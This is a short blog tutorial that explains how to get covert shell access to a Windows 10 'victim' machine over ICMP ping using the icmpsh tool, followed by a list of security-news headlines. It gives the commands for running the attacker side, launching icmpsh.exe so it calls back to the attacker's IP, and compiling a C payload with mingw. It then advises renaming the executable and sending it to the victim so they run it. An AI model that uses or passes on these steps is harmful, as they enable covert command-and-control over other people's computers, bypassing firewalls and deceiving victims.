ICMP Shell- Secret Command and Control Channel to Control Victims Machine Using Ping

Corporate firewalls can block reverse and bind TCP connections. However, corporate firewalls are behind internal networks. So we can use PING as a great convert channel to get victim shell access using ICMP Shell.

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)

Attacker Machine:-

  • Download the ICMP SHELL tool Here
  • execute command  ./run.sh shell script with 777 Permissions ( read, write, execute)
  • The output of the shell script command will give a piece of code icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.

Victim Machine:-

  • Upload “icmpsh.exe” on the victim machine.
  • Run CMD and  Execute “icmpsh.exe -t <Attackers IP> -d 500 -b 30 -s 128” as a listener.
  • Here Listener script will be icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.
  • Execute this with CMD  & No admin privileges are needed.

Also Read :  Operating Systems can be detected using Ping Command

Back to Attacker Machine:-

  • Once the Listener is executed on my Windows 10 victim machine, Here we got a shell with ICMP.
  • So we can start our command and control of victim’s pc.
  • So only, ICMP requests/response traffic only sent via the attacker’s machine to the victim’s machine.

Victims Click & Shell Access:-

  • If you want to compromise victim directly by clicking, you can download the c code here
  • After downloading compile the c code directly with the known victim IP Install MinGW in Kali Linux and run the following command to compile the C file i686-w64-mingw32-gcc icmp-slave-complete.c -o icmp-slave-complete.exe
  • Now you can Rename icmp-slave-complete.exe and send it to the victim. SHELL SHELL SHELL !!!
BALAGANESH

Recent Posts

Threat Actors Exploit Google Docs And Weebly Services For Malware Attacks

Phishing attackers used Google Docs to deliver malicious links, bypassing security measures and redirecting victims…

12 hours ago

Python NodeStealer: Targeting Facebook Business Accounts to Harvest Login Credentials

The Python-based NodeStealer, a sophisticated info-stealer, has evolved to target new information and employ advanced…

12 hours ago

XSS Vulnerability in Bing.com Let Attackers Send Crafted Malicious Requests

A significant XSS vulnerability was recently uncovered in Microsoft’s Bing.com, potentially allowing attackers to execute…

15 hours ago

Meta Removed 2 Million Account Linked to Malicious Activities

 Meta has announced the removal of over 2 million accounts connected to malicious activities, including…

18 hours ago

Veritas Enterprise Vault Vulnerabilities Lets Attackers Execute Arbitrary Code Remotely

Critical security vulnerability has been identified in Veritas Enterprise Vault, a widely-used archiving and content…

19 hours ago

7-Zip RCE Vulnerability Let Attackers Execute Remote Code

A critical security vulnerability has been disclosed in the popular file archiving tool 7-Zip, allowing…

19 hours ago